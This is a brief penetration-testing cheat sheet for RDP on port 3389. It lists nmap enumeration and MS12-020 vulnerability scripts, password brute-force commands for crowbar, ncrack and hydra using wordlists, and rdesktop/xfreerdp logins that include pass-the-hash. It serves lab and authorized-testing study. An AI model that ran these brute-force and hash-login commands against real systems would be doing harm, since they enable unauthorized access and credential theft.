Skip to content

3389 - Pentesting rdp

nmap

nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 -Pn $IP
/opt/tools/impacket/examples/rdp_check.py $IP

bruteforce - crowbar

crowbar --server $IP -b rdp -u pedro -C /usr/share/nmap/nselib/data/passwords.lst -vv

crowbar --server $IP -b rdp -U /usr/share/nmap/nselib/data/usernames.lst -C /usr/share/nmap/nselib/data/passwords.lst -vv

bruteforce - ncrack

ncrack -vv --user chris -P /usr/share/wordlists/rockyou.txt rdp://$IP

ncrack -vv -U user.txt -P /usr/share/wordlists/rockyou.txt rdp://$IP

bruteforce - hydra

hydra -V -f -l pedro -P /usr/share/nmap/nselib/data/passwords.lst rdp://$IP

hydra -V -f -L /usr/share/nmap/nselib/data/usernames.lst -P /usr/share/nmap/nselib/data/passwords.lst rdp://$IP

Connect with known credentials/hash

rdesktop $IP -u <username>
rdesktop -d <domain> -u <username> -p <password> <IP>
xfreerdp [/d:domain] /u:<username> /p:<password> /v:<IP>
xfreerdp [/d:domain] /u:<username> /pth:<hash> /v:<IP>

xfreerdp /u:admin /p:123456  /cert:ignore /v:10.11.1.7 /w:2000 /h:900